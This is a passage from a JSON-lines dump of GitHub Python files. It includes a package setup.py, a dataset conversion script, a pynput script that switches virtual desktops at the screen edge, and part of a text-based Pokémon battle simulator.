'w', encoding='utf-8') as f:\n f.write(Utils.INSTANCE_DELIMITER.join(raw))\n print('Jokes extracted.')\n\n\n","repo_name":"super-cooper/Markov-Plus-Plus","sub_path":"extract_jokes.py","file_name":"extract_jokes.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7253297940","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"learncube\",\n version=\"0.1.0\",\n author=\"Fabian Riewe\",\n author_email=\"f.riewe@bueffelheld.de\",\n description=\"A Python wrapper for the Learncube API\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Bueffelheld/learncube-python\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"Bueffelheld/learncube-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25172210990","text":"import argparse\nfrom Processors.mb import convert_train_dataset, convert_eval_dataset\n\n\ndef main():\n \n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--output_folder\", default=None, type=str, required=True)\n parser.add_argument(\"--data_path\", default=None, type=str, required=True,\n help=\"folder containing a.toks, b.toks, sim.txt\")\n parser.add_argument(\"--set_name\", default='train', type=str, required=False,\n help=\"set name.\")\n parser.add_argument(\"--mode\", default='test', type=str, required=False,\n help=\"mode: train / test\")\n args = parser.parse_args()\n\n if 
args.mode.lower() == 'test':\n convert_eval_dataset(args.data_path, args.output_folder, args.set_name)\n elif args.mode.lower() == 'train':\n convert_train_dataset(args.data_path, args.output_folder, args.set_name)\n else : \n raise ValueError('mode must be in: train, test ')\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"mbougha/MarkerBERT","sub_path":"convert_mb.py","file_name":"convert_mb.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70514262180","text":"# ~ from pynput.mouse import Button, Controller\n# ~ from pynput.keyboard import Key, Controller\nimport pynput, time\nButton = pynput.mouse.Button\nmouse = pynput.mouse.Controller()\nkeyboard = pynput.keyboard.Controller()\nKey = pynput.keyboard.Key\nlistener = pynput.mouse.Listener\n\nleftPressed = False\ndesktopCount = 4 #This needs to be changed depending on your needs\ncurrentDesktopNumber = 1\nscreenWidth = 1919 #this needs to be set on your screen width resolution -1\n\ndef f_choose(num):\n\t\t\tif num == 1:\n\t\t\t\tkeyboard.press(Key.f1)\n\t\t\telif num == 2:\n\t\t\t\tkeyboard.press(Key.f2)\n\t\t\telif num == 3:\n\t\t\t\tkeyboard.press(Key.f3)\n\t\t\telif num == 4:\n\t\t\t\tkeyboard.press(Key.f4)\n\t\t\telif num == 5:\n\t\t\t\tkeyboard.press(Key.f5)\n\t\t\telif num == 6:\n\t\t\t\tkeyboard.press(Key.f6)\n\t\t\telif num == 7:\n\t\t\t\tkeyboard.press(Key.f7)\n\t\t\telif num == 8:\n\t\t\t\tkeyboard.press(Key.f8)\n\t\t\telif num == 9:\n\t\t\t\tkeyboard.press(Key.f9)\n\t\t\telif num == 10:\n\t\t\t\tkeyboard.press(Key.f10)\n\t\t\telif num == 11:\n\t\t\t\tkeyboard.press(Key.f11)\n\t\t\telif num == 12:\n\t\t\t\tkeyboard.press(Key.f12)\n\ndef release_all():\n\t\t\tkeyboard.release(Key.shift)\n\t\t\tkeyboard.release(Key.ctrl)\n\t\t\tkeyboard.release(Key.f1)\n\t\t\tkeyboard.release(Key.f2)\n\t\t\tkeyboard.release(Key.f3)\n\t\t\tkeyboard.release(Key.f4)\n\t\t\tkeyboard.release(Key.f5)\n\t\t\tkeyboard.release(Key.f6)\n\t\t\tkeyboard.release(Key.f7)\n\t\t\tkeyboard.release(Key.f8)\n\t\t\tkeyboard.release(Key.f9)\t#I am too lazy :D\n\t\t\tkeyboard.release(Key.f10)\n\t\t\tkeyboard.release(Key.f11)\n\t\t\tkeyboard.release(Key.f12)\n\ndef on_click(x, y, button, pressed):\n global leftPressed\n if button == pynput.mouse.Button.left:\n if pressed:\n leftPressed = True\n else:\n leftPressed = False\n\n\n# ~ while True:\ndef on_move(x, y):\n\t#time.sleep(0.05)\n\tglobal currentDesktopNumber\n\ttry:\n\t\tif (mouse.position[0] == 0):\n\t\t\tmouse.position = (screenWidth, mouse.position[1])\n\t\t\t\n\t\t\tif (currentDesktopNumber > 1):\n\t\t\t\tcurrentDesktopNumber=currentDesktopNumber-1\n\t\t\telse:\n\t\t\t\tcurrentDesktopNumber = desktopCount\n\t\t\t\n\t\t\t# ~ print (currentDesktopNumber)\n\t\t\t\t\t\t\n\t\t\tif (leftPressed):\n\t\t\t\t# ~ print (\"window held\")\n\t\t\t\tkeyboard.press(Key.ctrl)\n\t\t\t\tkeyboard.press(Key.shift) #put the switch window desktop extra key shortcut/command\n\t\t\t\tmouse.release(Button.left) # just because... 
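# Two small notes on the records above. First, MBot.send's except-branch
# builds "Error sending messages. In queue: " + int(len(self.sendlines)), and
# str + int raises its own TypeError inside the handler; formatting the count
# into the message avoids that:

import sys

def report_backlog(sendlines):
    print(f"Error sending messages. In queue: {len(sendlines)}", file=sys.stderr)

# Second, pynput's Key exposes f1 ... f12 as plain attributes, so the
# f_choose / release_all ladders collapse to a getattr lookup (sketch):

from pynput.keyboard import Key

def f_key(num):
    return getattr(Key, f"f{num}") if 1 <= num <= 12 else None

# usage: keyboard.press(f_key(currentDesktopNumber))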
probably does not help\n\t\t\t\tf_choose(currentDesktopNumber)\n\t\t\t\trelease_all()\n\t\t\t\n\t\t\tkeyboard.press(Key.ctrl)\n\t\t\tf_choose(currentDesktopNumber)\n\t\t\trelease_all()\n\t\t\t\n\t\t\t\n\t\telif (mouse.position[0] == screenWidth):\n\t\t\tmouse.position = (1, mouse.position[1])\n\t\t\t\n\t\t\tif (currentDesktopNumber < desktopCount):\n\t\t\t\tcurrentDesktopNumber=currentDesktopNumber+1\n\t\t\telse:\n\t\t\t\tcurrentDesktopNumber = 1\n\t\t\t\n\t\t\t# ~ print (currentDesktopNumber)\n\t\t\t\t\t\t\t\t\t\n\t\t\tif (leftPressed):\n\t\t\t\t# ~ print (\"window held\")\n\t\t\t\tkeyboard.press(Key.ctrl)\n\t\t\t\tkeyboard.press(Key.shift) #put the switch window desktop extra key shortcut/command\n\t\t\t\tmouse.release(Button.left) # just because... probably does not help\n\t\t\t\tf_choose(currentDesktopNumber)\n\t\t\t\trelease_all()\n\t\t\t\n\t\t\tkeyboard.press(Key.ctrl)\n\t\t\tf_choose(currentDesktopNumber)\n\t\t\trelease_all()\n\t\t\t\n\texcept Exception as e:\n\t\tprint(\"ERROR:\", e)\n\nlistener = pynput.mouse.Listener(\n on_move=on_move,\n on_click=on_click)\nlistener.start()\nlistener.join()\n\n\n\n# ~ # Read pointer position\n# ~ print('The current pointer position is {0}'.format(\n # ~ mouse.position))\n\n# ~ # Set pointer position\n# ~ mouse.position = (10, 20)\n# ~ print('Now we have moved it to {0}'.format(\n # ~ mouse.position))\n\n# ~ # Move pointer relative to current position\n# ~ mouse.move(5, -5)\n\n# ~ # Press and release\n# ~ mouse.press(Button.left)\n# ~ mouse.release(Button.left)\n\n# ~ # Double click; this is different from pressing and releasing\n# ~ # twice on macOS\n# ~ mouse.click(Button.left, 2)\n\n# ~ # Scroll two steps down\n# ~ mouse.scroll(0, 2)\n","repo_name":"CactiChameleon9/Switch-desktop-on-edge-python-script","sub_path":"slideOnEdge.py","file_name":"slideOnEdge.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29509435268","text":"from logging import BufferingFormatter\r\nimport random\r\nimport math\r\nfrom AccuracyCheck import accuracyCheck\r\nfrom ParseAttack import parseAttack\r\nfrom ParseItem import parseItem\r\nfrom Stage2Mult import stage2Mult\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom tkinter.messagebox import showerror\r\nfrom PIL import Image\r\n\r\n\r\nclass Battle:\r\n\r\n def options(self,trainer):\r\n team = trainer.team\r\n moveset = team[0].moveset\r\n pp = team[0].PP\r\n availableMoves = []\r\n moveAddresses = []\r\n movePP = []\r\n for i in range(len(pp)):\r\n if pp[i]>0:\r\n availableMoves.append(moveset[i])\r\n moveAddresses.append(i)\r\n movePP.append(pp[i])\r\n availableSwaps = []\r\n swapAddresses = []\r\n for p in range(len(team)-1):\r\n if team[p+1].HP>0:\r\n availableSwaps.append(team[p+1])\r\n swapAddresses.append(p+1)\r\n availableActions = {\r\n \"pokeOut\":team[0],\r\n \"moves\":availableMoves,\r\n \"pp\":movePP,\r\n \"swaps\":availableSwaps,\r\n \"swapAddresses\":swapAddresses,\r\n \"items\":trainer.items\r\n }\r\n return availableActions\r\n \r\n def disableCheck(self,pokeChar):\r\n if (pokeChar.disable != \"\"):\r\n pokeChar.turncount[\"disable\"] = pokeChar.turncount[\"disable\"]-1\r\n if pokeChar.turncount[\"disable\"] == 0:\r\n print(pokeChar.poke[\"name\"]+\"'s \"+pokeChar.disable+\" is no longer disabled!\")\r\n pokeChar.disable = \"\"\r\n\r\n def metronome(self,pokeAttacker,pokeDefender,moveAddress,attacker,defender):\r\n # metronome will do something strange -- it will pick a random move (other 
than metronome) and then execute that move. To use the parse attack function as written, we first switch out the move in its own moveset, then change it back to metronome after the attack is carried out.\r\n\r\n # if a twoturn move was used by metronome\r\n if pokeAttacker.buffer != \"\":\r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"].casefold()==\"metronome\":\r\n metronomeMove = self.moveInfo[\"moves\"][i]\r\n moveToUse = pokeAttacker.buffer\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking with \"+ moveToUse[\"name\"]+\"!\")\r\n pokeAttacker.moveset[moveAddress] = moveToUse #briefly make the move different\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n pokeAttacker.moveset[moveAddress] = metronomeMove\r\n pokeAttacker.buffer = \"\"\r\n return result\r\n\r\n moveList = []\r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"] not in [\"Metronome\",\"Mirror Move\",\"Struggle\",\"Mimic\"]:\r\n moveList.append(self.moveInfo[\"moves\"][i])\r\n elif self.moveInfo[\"moves\"][i][\"name\"] == \"Metronome\":\r\n metronomeMove = self.moveInfo[\"moves\"][i]\r\n moveToUse = random.sample(moveList,1)[0]\r\n pokeAttacker.moveset[moveAddress] = moveToUse #briefly make the move different\r\n print(\"Metronome landed on \"+moveToUse[\"name\"]+\"!\")\r\n # must handle counter and twoturn moves differently\r\n if moveToUse[\"name\"] == \"Counter\":\r\n print(\"The move did nothing!\")\r\n return \"\"\r\n elif moveToUse[\"category\"] == [\"twoturn\",\"bide\",\"bindlike\",\"thrashlike\",\"rage\"]:\r\n pokeAttacker.buffer = moveToUse\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n pokeAttacker.moveset[moveAddress] = metronomeMove\r\n else:\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n # now bring metronome back\r\n pokeAttacker.moveset[moveAddress] = metronomeMove\r\n if result not in [\"fail:confuse\",\"fail:paralyze\"]:\r\n pokeDefender.mirrorable = \"metronome\"\r\n return result\r\n\r\n def mirrormove(self,pokeAttacker,pokeDefender,moveAddress,attacker,defender):\r\n # mirror move will do something strange -- it will try to use and then execute that move. 
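# Both metronome and mirrormove follow the same pattern: splice a borrowed
# move into the attacker's own moveset, call parseAttack, then splice
# Metronome / Mirror Move back in. A try/finally makes that restore
# unconditional even if the attack path raises (sketch; the extra parseAttack
# arguments -- typeInfo, moveInfo, badges -- are elided):

def use_borrowed_move(poke_attacker, poke_defender, slot, real_move, borrowed, attack_fn):
    poke_attacker.moveset[slot] = borrowed
    try:
        return attack_fn(poke_attacker, poke_defender, slot)
    finally:
        poke_attacker.moveset[slot] = real_move  # always undo the splice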
To use the parse attack function as written, we first switch out the move in its own moveset, then change it back to metronome after the attack is carried out.\r\n \r\n # if a twoturn move was used by mirror move\r\n if pokeAttacker.buffer != \"\":\r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"].casefold()==\"mirror move\":\r\n mirrormoveMove = self.moveInfo[\"moves\"][i]\r\n moveToUse = pokeAttacker.buffer\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking with \"+ moveToUse[\"name\"]+\"!\")\r\n pokeAttacker.moveset[moveAddress] = moveToUse #briefly make the move different\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n pokeAttacker.moveset[moveAddress] = mirrormoveMove\r\n pokeAttacker.buffer = \"\"\r\n return result \r\n \r\n for i in range(len(self.moveInfo[\"moves\"])):\r\n if self.moveInfo[\"moves\"][i][\"name\"].casefold()==pokeAttacker.mirrorable.casefold():\r\n moveToUse = self.moveInfo[\"moves\"][i]\r\n if self.moveInfo[\"moves\"][i][\"name\"].casefold()==\"mirror move\":\r\n mirrormoveMove = self.moveInfo[\"moves\"][i]\r\n if pokeAttacker.mirrorable == \"\":\r\n moveToUse = mirrormoveMove\r\n pokeAttacker.moveset[moveAddress] = moveToUse #briefly make the move different\r\n \r\n if moveToUse[\"name\"].casefold() == \"metronome\":\r\n result = self.metronome(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n pokeAttacker.moveset[moveAddress] = mirrormoveMove\r\n return result\r\n\r\n elif moveToUse[\"category\"] == \"twoturn\":\r\n pokeAttacker.buffer = moveToUse\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n pokeAttacker.moveset[moveAddress] = mirrormoveMove\r\n return result\r\n\r\n if moveToUse[\"name\"].casefold() != \"mirror move\":\r\n print(pokeAttacker.poke[\"name\"] + \" is trying to mirror \"+moveToUse[\"name\"]+\"!\")\r\n \r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n # now bring mirror move back, so long as charging is over\r\n pokeAttacker.moveset[moveAddress] = mirrormoveMove\r\n if result not in [\"fail:confuse\",\"fail:paralyze\"]:\r\n pokeDefender.mirrorable = \"mirror move\"\r\n\r\n \r\n return result\r\n\r\n def statusCheck(self,character,pokeChar,pokeNot):\r\n loss = False\r\n toSwitch = False\r\n # burn, poison and toxic all do damage based on the toxic counter, which is bizarre but true!\r\n if pokeChar.status == \"burn\":\r\n burnDamage = min(pokeChar.HP,max(math.ceil(pokeChar.maxHP/16),pokeChar.turncount[\"toxic\"]*math.ceil(pokeChar.maxHP/16)))\r\n pokeChar.activeStats[0] = pokeChar.HP-burnDamage\r\n pokeChar.setStats()\r\n print(pokeChar.poke[\"name\"] + \" took \"+str(burnDamage)+ \" damage from its burn!\")\r\n elif pokeChar.status == \"poison\":\r\n poisonDamage = min(pokeChar.HP,max(math.ceil(pokeChar.maxHP/16),pokeChar.turncount[\"toxic\"]*math.ceil(pokeChar.maxHP/16)))\r\n pokeChar.activeStats[0] = pokeChar.HP-poisonDamage\r\n pokeChar.setStats()\r\n print(pokeChar.poke[\"name\"] + \" took \"+str(poisonDamage)+ \" damage from poison!\")\r\n if (pokeChar.HP!=0) and pokeChar.leechSeed:\r\n leechDamage = min(pokeChar.HP,max(math.ceil(pokeChar.maxHP/16),pokeChar.turncount[\"toxic\"]*math.ceil(pokeChar.maxHP/16)))\r\n pokeChar.activeStats[0] = pokeChar.HP-leechDamage\r\n pokeChar.setStats()\r\n print(pokeChar.poke[\"name\"] + \" took \"+str(leechDamage)+ 
\" damage from Leech Seed!\")\r\n leechHeal = min(leechDamage,pokeNot.maxHP-pokeNot.HP)\r\n if leechHeal!=0:\r\n pokeNot.activeStats[0] = pokeNot.HP+leechHeal\r\n pokeNot.setStats()\r\n print(pokeNot.poke[\"name\"] + \" healed \"+str(leechHeal)+ \" from Leech Seed!\")\r\n\r\n if pokeChar.HP == 0:\r\n pokeChar.status = \"faint\"\r\n #print(pokeChar.poke[\"name\"]+\" has fainted!\")\r\n options = []\r\n for i in range(len(character.team)):\r\n if character.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n #print(character.name + \" has no Pokemon left to battle.\")\r\n #print(character.name + \" has lost the battle!\")\r\n loss = True\r\n else:\r\n toSwitch = True\r\n\r\n # the pokeCharmon hasn't fainted\r\n if pokeChar.turncount[\"toxic\"]!=0:\r\n pokeChar.turncount[\"toxic\"] = pokeChar.turncount[\"toxic\"]+1 \r\n return [loss,toSwitch]\r\n\r\n\r\n def attackPhase(self,optionPlayer,optionEnemy):\r\n # a strange turn will occur if one of the characters is recharging.\r\n # bools for which player is attacking.\r\n # handled differently if one or both attack.\r\n playerIs = optionPlayer[0]==\"attack\"\r\n enemyIs = optionEnemy[0]==\"attack\"\r\n firstToSwitch = False\r\n secondToSwitch = False\r\n # if only one player tried an attack, the process is easier\r\n if not (playerIs and enemyIs):\r\n if playerIs:\r\n # only player is attacking\r\n attacker=self.player\r\n moveAddress = optionPlayer[1]\r\n defender=self.enemy\r\n first = \"player\"\r\n second = \"enemy\"\r\n else:\r\n # only enemy is attacking\r\n attacker=self.enemy\r\n moveAddress = optionEnemy[1]\r\n defender=self.player\r\n first = \"enemy\"\r\n second = \"player\"\r\n pokeAttacker=attacker.team[0]\r\n pokeDefender=defender.team[0]\r\n # check if attack will land\r\n if (pokeAttacker.status not in [\"sleep\",\"freeze\"]) and (pokeAttacker.turncount[\"bound\"]==-1):\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking \"+ pokeDefender.poke[\"name\"]+ \" with \" + pokeAttacker.moveset[moveAddress][\"name\"])\r\n if pokeAttacker.moveset[moveAddress][\"name\"] not in [\"Mirror Move\",\"Metronome\"]:\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Metronome\":\r\n result = self.metronome(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Mirror Move\":\r\n result = self.mirrormove(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n #handle the case where either player's pokemon has fainted\r\n [firstToSwitch,secondToSwitch,lossAttacker,lossDefender]=self.checkResult(result,attacker,defender)\r\n if lossAttacker:\r\n if lossDefender:\r\n return \"loss:both\"\r\n else:\r\n return \"loss:\"+first\r\n elif lossDefender:\r\n return \"loss:\"+second\r\n\r\n # poison and burn damage apply if neither player's pokemon fainted, take status damage and check again\r\n if not (firstToSwitch or secondToSwitch):\r\n [lossAttacker,firstToSwitch] = self.statusCheck(attacker,pokeAttacker,pokeDefender)\r\n if lossAttacker:\r\n return \"loss:\"+first\r\n # this is the case where only one pokemon attacked, which means the defender has swapped/used an item. \r\n # This means they will take status damage at the end of the turn, i.e. 
here, so long as nobody fainted\r\n if not (firstToSwitch or secondToSwitch):\r\n [lossDefender,secondToSwitch] = self.statusCheck(defender,pokeDefender,pokeAttacker)\r\n if lossDefender:\r\n return \"loss:\"+second \r\n\r\n else:\r\n # this is the case where both players attacked! We need to \r\n # 1) determine whose move goes first by checking priority and speed. In gen 1 there are only two priority moves:\r\n # Quick Attack, which goes first, and Counter, which goes second. \r\n # 2) check if the first move goes through\r\n # 3) if yes, determine the effect of the first move\r\n # 4) check if the second move goes through, which includes the possibility that either pokemon has died\r\n # or that a status (wrap, sleep, etc.) has been incurred\r\n # 5) if yes, determine the effect of the second move\r\n firstStatusChecked = False\r\n playerMove = self.player.team[0].moveset[optionPlayer[1]]\r\n enemyMove = self.enemy.team[0].moveset[optionEnemy[1]]\r\n prio = [0,0]\r\n if (playerMove[\"name\"] == \"Quick Attack\"):\r\n prio[0] = 1\r\n if (enemyMove[\"name\"] == \"Quick Attack\"):\r\n prio[1] = 1\r\n if (playerMove[\"name\"] == \"Counter\"):\r\n prio[0] = -1\r\n if (enemyMove[\"name\"] == \"Counter\"):\r\n prio[1] = -1\r\n if prio[0]>prio[1]:\r\n first=\"player\"\r\n elif prio[1]>prio[0]:\r\n first=\"enemy\"\r\n else:\r\n # check speed if there is a priority tie\r\n # implement speed stat stages and paralysis here\r\n playerSpeed = self.player.team[0].speed\r\n enemySpeed = self.enemy.team[0].speed\r\n \r\n if playerSpeed == enemySpeed:\r\n # speed tie case. coin toss\r\n speedRoll = random.randint(0,1)\r\n if speedRoll==0:\r\n first = \"player\"\r\n else:\r\n first = \"enemy\"\r\n elif playerSpeed>enemySpeed:\r\n first=\"player\"\r\n else:\r\n first=\"enemy\"\r\n # now we know who went first, so we have to process the first attack\r\n if first == \"player\":\r\n second = \"enemy\"\r\n # player is attacking\r\n attacker=self.player\r\n moveAddress = optionPlayer[1]\r\n defender=self.enemy\r\n else:\r\n second = \"player\"\r\n # enemy is attacking\r\n attacker=self.enemy\r\n moveAddress = optionEnemy[1]\r\n defender=self.player\r\n pokeAttacker=attacker.team[0]\r\n pokeDefender=defender.team[0]\r\n if (pokeAttacker.status not in [\"sleep\",\"freeze\"]) and (pokeAttacker.turncount[\"bound\"]==-1):\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking \"+ pokeDefender.poke[\"name\"]+ \" with \" + pokeAttacker.moveset[moveAddress][\"name\"])\r\n\r\n if (playerMove[\"name\"] == \"Counter\") and (enemyMove[\"name\"] == \"Counter\"):\r\n print(\"Counter failed!\")\r\n pokeAttacker.lastDamage[0] = 0\r\n result = \"\" \r\n elif pokeAttacker.moveset[moveAddress][\"name\"] not in [\"Mirror Move\",\"Metronome\"]:\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Metronome\":\r\n result = self.metronome(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Mirror Move\":\r\n result = self.mirrormove(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n\r\n# check for possible losses or deaths\r\n [firstToSwitch,secondToSwitch,lossAttacker,lossDefender]=self.checkResult(result,attacker,defender)\r\n if lossAttacker:\r\n if lossDefender:\r\n return \"loss:both\"\r\n else:\r\n return \"loss:\"+first\r\n elif lossDefender:\r\n return \"loss:\"+second\r\n # poison and burn damage apply if neither player's 
pokemon fainted, take status damage and check again\r\n if not (firstToSwitch or secondToSwitch):\r\n [lossAttacker,firstToSwitch] = self.statusCheck(attacker,pokeAttacker,pokeDefender)\r\n firstStatusChecked = True # if not, we have to check at the end of the turn\r\n if lossAttacker:\r\n return \"loss:\"+first\r\n\r\n # now the first attack is over. many things can happen as a result of the first attack.\r\n # the defender may have died, the attack may have been disabled, they might have been statused\r\n # the attacker also may have died due to recoil, confusion, poison, burn or explosion/selfdestruct\r\n \r\n # this is the case that the defender is still alive after the turn\r\n if result not in [\"defender:faint\",\"both:faint\",\"unable\"]:\r\n if first == \"player\":\r\n # enemy is attacking now\r\n attacker=self.enemy\r\n moveAddress = optionEnemy[1]\r\n defender=self.player\r\n else:\r\n # player is attacking\r\n attacker=self.player\r\n moveAddress = optionPlayer[1]\r\n defender=self.enemy\r\n pokeAttacker=attacker.team[0]\r\n pokeDefender=defender.team[0]\r\n if not pokeAttacker.flinching:\r\n if (pokeAttacker.status not in [\"sleep\",\"freeze\"]) and (pokeAttacker.turncount[\"bound\"]==-1):\r\n print(pokeAttacker.poke[\"name\"]+ \" is attacking \"+ pokeDefender.poke[\"name\"]+ \" with \" + pokeAttacker.moveset[moveAddress][\"name\"])\r\n if (playerMove[\"name\"] == \"Counter\") and (enemyMove[\"name\"] == \"Counter\"):\r\n print(\"Counter failed!\")\r\n pokeAttacker.lastDamage[0] = 0\r\n result = \"\" \r\n elif pokeAttacker.moveset[moveAddress][\"name\"] not in [\"Mirror Move\", \"Metronome\"]:\r\n result = parseAttack(pokeAttacker,pokeDefender,moveAddress,self.typeInfo,self.moveInfo,attacker.badges,defender.badges)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Metronome\":\r\n result = self.metronome(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n elif pokeAttacker.moveset[moveAddress][\"name\"] == \"Mirror Move\":\r\n result = self.mirrormove(pokeAttacker,pokeDefender,moveAddress,attacker,defender)\r\n\r\n [secondToSwitch,firstToSwitch,lossAttacker,lossDefender]=self.checkResult(result,attacker,defender)\r\n if lossAttacker:\r\n if lossDefender:\r\n return \"loss:both\"\r\n else:\r\n return \"loss:\"+second\r\n elif lossDefender:\r\n return \"loss:first\"\r\n else:\r\n print(pokeAttacker.poke[\"name\"] + \" flinched!\")\r\n pokeAttacker.flinching=False\r\n \r\n # status gets checked here so long as the pokemon didn't faint or knock out its opponent\r\n if not (secondToSwitch or (result == \"defender:faint\")):\r\n if result not in [\"sleep\",\"freeze\",\"flinch\"]:\r\n self.disableCheck(pokeAttacker)\r\n [lossAttacker,secondToSwitch] = self.statusCheck(attacker,pokeAttacker,pokeDefender)\r\n if lossAttacker:\r\n return \"loss:\"+second\r\n if not firstStatusChecked:\r\n [lossDefender,firstToSwitch] = self.statusCheck(defender,pokeDefender,pokeAttacker)\r\n if lossDefender:\r\n return \"loss:\"+first \r\n\r\n # one niche possibility is that the first pokemon used Haze while the second was asleep/frozen. In this case, the second pokemon should be unable to attack. 
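# One detail in the second-attack handling above: the knockout branch returns
# the literal string "loss:first" where every other branch interpolates the
# side with "loss:" + first, so a caller matching on "loss:player" /
# "loss:enemy" would never see this outcome. The convention, factored out:

def resolve_loss(loss_attacker, loss_defender, attacker_side, defender_side):
    if loss_attacker and loss_defender:
        return "loss:both"
    if loss_attacker:
        return "loss:" + attacker_side
    if loss_defender:
        return "loss:" + defender_side  # not the literal "loss:first"
    return ""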
in this case, result is \"unable\", and we skip to status check\r\n if result == \"unable\":\r\n if first == \"player\":\r\n # enemy is attacking now\r\n attacker=self.enemy\r\n moveAddress = optionEnemy[1]\r\n defender=self.player\r\n else:\r\n # player is attacking\r\n attacker=self.player\r\n moveAddress = optionPlayer[1]\r\n defender=self.enemy\r\n\r\n [lossAttacker,secondToSwitch] = self.statusCheck(attacker,pokeAttacker,pokeDefender)\r\n if lossAttacker:\r\n return \"loss:\"+second\r\n if not firstStatusChecked:\r\n [lossDefender,firstToSwitch] = self.statusCheck(defender,pokeDefender,pokeAttacker)\r\n if lossDefender:\r\n return \"loss:\"+first \r\n\r\n\r\n if firstToSwitch:\r\n if first == \"player\":\r\n print(self.player.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.player,self.enemy)\r\n else:\r\n print(self.enemy.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.enemy,self.player)\r\n if secondToSwitch:\r\n if second == \"player\":\r\n print(self.player.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.player,self.enemy)\r\n else:\r\n print(self.enemy.name+\" needs to swap in a Pokemon.\")\r\n self.swapIn(self.enemy,self.player)\r\n return \"\"\r\n\r\n def checkResult(self,result,attacker,defender):\r\n firstToSwitch = False\r\n secondToSwitch = False\r\n lossDefender = False\r\n lossAttacker = False\r\n if result == \"defender:faint\":\r\n defender.team[0].status = \"faint\"\r\n options = []\r\n for i in range(len(defender.team)):\r\n if defender.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(defender.name + \" has no Pokemon left to battle.\")\r\n print(defender.name + \" has lost the battle!\")\r\n lossDefender = True\r\n else:\r\n secondToSwitch = True\r\n if result == \"attacker:faint\":\r\n attacker.team[0].status = \"faint\"\r\n options = []\r\n for i in range(len(attacker.team)):\r\n if attacker.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(attacker.name + \" has no Pokemon left to battle.\")\r\n print(attacker.name + \" has lost the battle!\")\r\n lossAttacker = True\r\n else:\r\n firstToSwitch = True\r\n if result == \"both:faint\":\r\n defender.team[0].status = \"faint\"\r\n attacker.team[0].status = \"faint\"\r\n options = []\r\n for i in range(len(defender.team)):\r\n if defender.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(defender.name + \" has no Pokemon left to battle.\")\r\n lossDefender = True\r\n else:\r\n secondToSwitch = True\r\n options = []\r\n for i in range(len(attacker.team)):\r\n if attacker.team[i].status != \"faint\":\r\n options.append(i)\r\n if options == []:\r\n print(attacker.name + \" has no Pokemon left to battle.\")\r\n lossAttacker = True\r\n else:\r\n firstToSwitch = True\r\n #if lossAttacker:\r\n #if lossDefender:\r\n # a draw\r\n # print(\"Both players have lost the battle!\")\r\n #else:\r\n #print(attacker.name+\" has lost the battle!\")\r\n\r\n #elif lossDefender:\r\n #print(defender.name+\" has lost the battle!\")\r\n return [firstToSwitch,secondToSwitch,lossAttacker,lossDefender]\r\n\r\n def swapIn(self,character,opposite):\r\n options = []\r\n for i in range(len(character.team)):\r\n if character.team[i].status != \"faint\":\r\n options.append(i)\r\n for i in range(len(options)):\r\n print(\"[\"+str(options[i])+\"] \" + character.team[options[i]].poke[\"name\"]+\" 